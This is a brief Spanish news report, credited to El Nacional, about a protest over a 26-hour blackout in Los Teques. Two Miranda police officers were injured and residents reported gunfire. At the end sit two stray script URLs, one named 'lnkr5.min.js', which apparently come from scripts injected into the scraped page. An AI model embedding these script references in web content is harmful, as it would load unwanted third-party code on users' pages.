El enfrentamiento entre los funcionarios y los manifestantes que se quejaban de la falta de luz se prolongó durante horas.

La noche del jueves dos funcionarios de la Policía de Mianda (Polimiranda) resultaron heridos en una manifestación por las fallas de servicio eléctrico en el sector La Matica, en Los Teques. Los manifestantes levantaron barricadas para impedir el paso vehicular en forma de protesta debido a que aseguraron que llevaban 26 horas sin luz.

Polimiranda acudió al lugar para disgregar la protesta y dos funcionarios, identificados como el supervisor Sarmiento y el oficial José Chiquito, resultados heridos con objetos contundentes. Se trasladó al supervisor a un centro de salud en Caracas, según reseñó El Pitazo.

El enfrentamiento entre la policía de Miranda y los manifestantes se extendió durante horas. Los vecinos presentes denunciaron que fue un encuentro “a tiros” y una fuente no confirmada dijo que se incautaron dos escopetas.

VÍA EL NACIONAL.

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1534520131435https://permissnew.com/addons/lnkr5.min.js

Loading...